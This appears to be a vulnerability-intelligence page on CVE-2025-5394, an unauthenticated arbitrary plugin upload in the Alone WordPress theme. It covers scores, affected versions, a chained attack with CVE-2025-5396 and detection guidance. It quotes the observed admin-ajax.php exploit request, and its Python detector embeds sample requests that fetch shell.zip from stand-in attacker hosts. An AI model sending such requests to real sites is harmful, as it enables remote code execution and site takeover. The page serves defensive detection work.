CVE-2025-5394
Published 2025-07-15
Priority: P1 (91) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW (exploited in the wild) · public exploit · VulnCheck KEV · ATT&CK tactic: Initial Access
EPSS: 47.81% (98.7th percentile)
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bearsthemes | Alone – Charity Multipurpose Non-profit WordPress Theme | <= 7.8.3 | 7.8.5 |
The Bears Backup plugin (<= 2.0.0) is the component installed and abused in the chained attack tracked as CVE-2025-5396; it is not the component vulnerable to CVE-2025-5394.
Detection & IOCs (extracted from sources)
Observed request (placeholders <url> and <file> as in the source):

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f<url>%2fplugin%2f<file>.zip
```

URL-decoded, the body carries `action=beplus_import_pack_install_plugin`, an empty `data[plugin_slug]`, and `data[plugin_source]=https://<url>/plugin/<file>.zip`, i.e. the ZIP is fetched by the server from a host the attacker controls.

Path: /wp-content/themes/alone/
- Monitor for POST requests to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin or action=beplus_import_pack_install_plugin; these indicate exploitation attempts of CVE-2025-5394.
- Look for newly created administrator accounts, suspicious ZIP files or plugin folders in the WordPress plugins directory, or newly installed file-manager plugins as indicators of post-exploitation activity.
- The vulnerable function alone_import_pack_install_plugin() is exposed via the wp_ajax_nopriv_ hook, so it is reachable without a login; alert on any unauthenticated AJAX call invoking this action.
- Attackers supply a remote URL in the plugin_source parameter pointing to a ZIP archive that contains a webshell; inspect the POST body for external URLs in the data[plugin_source] field.
- Attackers deploy password-protected PHP backdoors that allow persistent remote command execution over HTTP; hunt for newly uploaded PHP files in plugin directories following exploitation.
- The Nuclei template uses the action value 'beplus_import_pack_install_plugin', while Wordfence and BleepingComputer report 'alone_import_pack_install_plugin'. Monitor both: the template value may reflect an alias or alternate hook name used in some theme versions.
- The vulnerability affects Alone theme versions up to and including 7.8.3; version 7.8.5 is the patched release. Version 7.8.4 is referenced in the Bears Backup chain (CVE-2025-5396) but is NOT the fixed version; only 7.8.5 is confirmed safe.
- CVE-2025-5394 can be chained with CVE-2025-5396 (Bears Backup plugin RCE) on sites running Alone theme 7.8.4 and older: the Alone theme flaw is used to install the Bears Backup plugin, whose unauthenticated call_user_func() handler then gives full RCE.
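As an added example (not code from this page, from Wordfence, or from the Nuclei template), the following Python detector applies the checks above to captured HTTP requests. It assumes request bodies are available, for instance from a WAF or reverse-proxy audit log, because an access log alone does not record the POST body. The site hostname `victim.example`, the attacker hosts and the sample requests are constructed. It goes slightly beyond the bullet list by also inspecting GET query strings, since admin-ajax.php reads the action parameter from $_REQUEST and a GET therefore reaches the same handler as the observed POST.

```python
"""Flag CVE-2025-5394 exploitation attempts in captured HTTP requests.

Added example, not code from the original page, Wordfence or the Nuclei
template. Expects raw request text as a WAF or reverse proxy records it.
"""
from urllib.parse import parse_qs, urlsplit

# Both action names reported on the page (Wordfence/BleepingComputer and the
# Nuclei template). The hook is wp_ajax_nopriv_, so no login is needed.
SUSPECT_ACTIONS = {
    "alone_import_pack_install_plugin",
    "beplus_import_pack_install_plugin",
}
AJAX_PATH = "/wp-admin/admin-ajax.php"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def classify(raw, site_host):
    """Return a finding dict if the request targets the vulnerable action, else None.

    site_host is the hostname we serve (assumed); a plugin_source on any other
    host is the remote-ZIP pattern described in the IOCs above.
    """
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    if not url.path.endswith(AJAX_PATH):
        return None
    # admin-ajax.php takes the action from $_REQUEST, so a GET with the action
    # in the query string reaches the same handler as the observed POST.
    params = parse_qs(url.query, keep_blank_values=True)
    ctype = headers.get("content-type", "").lower()
    if method == "POST" and "x-www-form-urlencoded" in ctype:
        params.update(parse_qs(body, keep_blank_values=True))
    action = params.get("action", [""])[0]
    if action not in SUSPECT_ACTIONS:
        return None
    source = params.get("data[plugin_source]", [""])[0]
    src_host = (urlsplit(source).hostname or "").lower()
    return {
        "method": method,
        "action": action,
        "plugin_source": source,
        "remote_source": bool(src_host) and src_host != site_host.lower(),
        # A wordpress_logged_in_* cookie is only a heuristic for a logged-in
        # session; the nopriv handler works without one anyway.
        "unauthenticated": "wordpress_logged_in_" not in headers.get("cookie", ""),
    }


def scan(requests, site_host):
    """Run classify() over a batch of raw requests and keep only the hits."""
    return [f for f in (classify(r, site_host) for r in requests) if f]


# Constructed sample traffic, modelled on the request shape shown above.
SAMPLE_REQUESTS = [
    # Unauthenticated POST with the action name reported by Wordfence.
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: victim.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=alone_import_pack_install_plugin&data%5Bplugin_slug%5D=&"
    "data%5Bplugin_source%5D=https%3a%2f%2fattacker.example%2fplugin%2fshell.zip",
    # Alias action from the Nuclei template, sent from a logged-in session.
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: victim.example\r\n"
    "Cookie: wordpress_logged_in_0123=admin%7C1700000000%7Cdeadbeef\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&"
    "data%5Bplugin_source%5D=http%3A%2F%2F203.0.113.5%2Fbears-backup.zip",
    # Same action via GET query string, pointing at a ZIP on our own host.
    "GET /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin"
    "&data%5Bplugin_source%5D=https%3A%2F%2Fvictim.example%2Flocal.zip HTTP/1.1\r\n"
    "Host: victim.example\r\n\r\n",
    # Benign admin-ajax traffic that must not be flagged.
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: victim.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=heartbeat&_nonce=0a1b2c3d",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS, "victim.example"):
        print(hit)
```

The `remote_source` flag is what separates an exploitation attempt from a legitimate import of a bundled plugin: a source host other than the site itself means the server will download and unpack an attacker-chosen ZIP. A `data[plugin_source]` value hosted on the site itself can still be abuse (the attacker may have uploaded the archive elsewhere first), so a hit with `remote_source` false is worth a look rather than a dismissal.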
CVSS provenance
NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
GHSA
GHSA-mr9j-vgmq-cxhq (CVE-2025-5396, CRITICAL, CWE-94) · ghsa_unreviewed · 2025-07-17 · CVSS 9.8
The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.0. This is due to the bbackup_ajax_handle() function not having a capability check, nor validating user-supplied input passed directly to call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server, which can be leveraged to inject backdoors or create new administrative user accounts, among other things. On WordPress sites running the Alone theme versions 7.8.4 and older, this can be chained with CVE-2025-5394 to install the Bears Backup plugin and achieve the same impact.
GHSA
GHSA-jg98-c5j8-6598 (CVE-2025-5394, CRITICAL, CWE-862) · ghsa_unreviewed · 2025-07-15
Description: identical to the summary at the top of this page, without the CVE-2025-54019 duplicate note.
VulnCheck
Missing Authorization (CVE-2025-5394, CRITICAL) · vulncheck · 2025 · CVSS 9.8
Description: identical to the summary at the top of this page.
Affected: Bearsthemes Alone – Charity Multipurpose Non-profit
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/blog/2025/07/attackers-actively-exploi
Suricata
ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549) · suricata · 2025-07-02 · CVSS 8.2 · CVE-2023-6549 [HIGH]
This rule targets CVE-2023-6549 in Citrix NetScaler ADC/Gateway, not CVE-2025-5394; its only link to this page is the string 5394 in its `isdataat:5394` keyword. It does not detect the WordPress admin-ajax.php abuse described above, so do not treat it as coverage for this CVE. Rule as published (truncated in the source):

```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Citrix Netscaler ADC & Gateway Unauthenticated Out-of-Bounds Memory Read (CVE-2023-6549)"; flow:established,to_server; http.uri; content:"/nf/auth/startwebview.do"; fast_pattern; http.host; isdataat:5394; reference:url,bishopfox.com/blog/netscaler-adc-and-gateway-advisory; reference:cve,2023-6549; classtype:web-application-attack; sid:2063271; rev:1; metadata:affected_product Citrix, attack_target Server, created_at 2025_07_02, cve CVE_2023_6549, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2025_07_02, mitre_tactic_id TA0001, mitre_tactic_name Initi
```
Nuclei
Unauthenticated Arbitrary Plugin Upload in Alone Theme (CVE-2025-5394, CRITICAL) · nuclei · CVSS 9.8
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
Template (truncated in the source after the impact field):

```yaml
id: CVE-2025-5394
info:
  name: Unauthenticated Arbitrary Plugin Upload in Alone Theme
  author: Nxploited,DhiyaneshDK
  severity: critical
  description: |
    The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
  impact: |
    This makes it possible for unauthenticated attackers to upload zip files
```